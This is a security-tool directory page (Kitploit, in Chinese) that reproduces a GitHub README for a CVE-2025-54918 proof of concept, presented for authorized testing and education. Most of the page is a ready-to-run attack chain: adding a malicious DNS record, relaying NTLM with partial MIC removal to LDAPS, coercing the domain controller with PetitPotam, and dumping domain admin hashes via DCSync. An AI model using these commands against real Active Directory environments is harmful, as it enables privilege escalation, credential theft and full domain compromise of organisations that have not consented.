Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-54918-POC — CVE-2025-54918 的 POC 及技术演示。 | Kitploit
工具/GitHubGitHub/wh0am123/cve-2025-54918-poc
权限提升漏洞分析漏洞利用渗透测试身份验证学习与教育红队实验室与实践
GitHubwh0am123/cve-2025-54918-poc

CVE-2025-54918-POC

CVE-2025-54918 的 POC 及技术演示。

查看仓库
647238个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54918 – 概念验证 (PoC)

⚠️ 重要通知

重要提示:
要测试 CVE-2025-54918,您必须在目标 Active Directory 环境中创建一条 DNS 记录。
测试前务必咨询客户并获得明确授权,因为这可能会影响生产环境中的 DNS 和身份验证行为。

此仓库包含一个技术概念验证,演示了低权限域用户如何通过滥用 NTLM 反射结合身份验证强制提升到域管理员级别访问权限。

注意:即使将签署设置为 True(域控制器的默认值),该 CVE 仍可利用。此外,CVE-2025–54918 的修复针对的是 Windows 2025,而 CVE-2025–33073(非预期)修复了 Windows 2022。

更详细的技术分析可在我的 Medium 页面找到:https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1


环境

  • 域控制器 IP: 192.168.140.150(签署为 True,这是域控制器的默认值)
  • 攻击者 IP: 192.168.140.135
  • 域: nahya.local
  • 用户: test 有效的域用户(无 DCSync 权限)

工具

克隆所需仓库:

root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git

基线验证(预期失败)

验证用户在进行利用前无法执行 DCSync:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

普通用户


步骤 1:添加恶意 DNS 记录

使用 NetBIOS 名称 + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 创建一条解析到攻击者 IP 的 DNS 记录。

root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
  dc.nahya.local -a add \
  -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
  -d '192.168.140.135' -dns-ip 192.168.140.150

添加DNS


步骤 2:启动 NTLM 中继(终端 1)

使用部分 MIC 移除和 LDAP 权限提升选项运行 ntlmrelayx:

root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs

启动 ntlmrelayx


步骤 3:强制域控制器认证(终端 2)

使用强制技术 (PetitPotam) 强制域控制器向攻击者控制的 DNS 记录进行身份验证:

root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

强制DC


步骤 4:验证利用 (DCSync)

重新运行 secretsdump 以确认权限提升:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

✅ 预期结果:成功执行 DCSync 并获取 域管理员哈希

DCSync 成功


结果

此时,攻击者已经:

  • 中继了来自域控制器(签署为 True)的 NTLM 身份验证
  • 通过 LDAP 提升了权限
  • 实现了 DCSync,导致完全域沦陷

有关漏洞和攻击链的深入解释,请参阅 Medium 文章。


🙏 致谢

这项工作离不开以下贡献:

  • Bryan De Houwer – CVE-2025-54918 的作者 https://www.linkedin.com/in/bryan-de-houwer/
  • Andrea Pierini – 感谢他在 decoder.cloud 上的出色研究和博客 https://www.linkedin.com/in/andrea-pierini-aba9a37/
  • Andrea Pierini – 提供了 impacket-partial-mic 实现
    https://github.com/decoder-it/impacket-partial-mic

🔗 参考资料

  • 分析 NTLM 和 LDAP 身份验证绕过漏洞 – CrowdStrike Blog
    https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  • Microsoft 安全公告 – CVE-2025-54918 – MSRC 更新指南
    https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918


免责声明

本概念验证仅用于教育和授权的安全测试目的。

  • 不要对你不拥有或未经明确许可的系统使用此技术。
  • 作者对滥用或造成的损害不承担任何责任。
  • 请始终遵循负责任的披露和道德黑客实践。
下载工具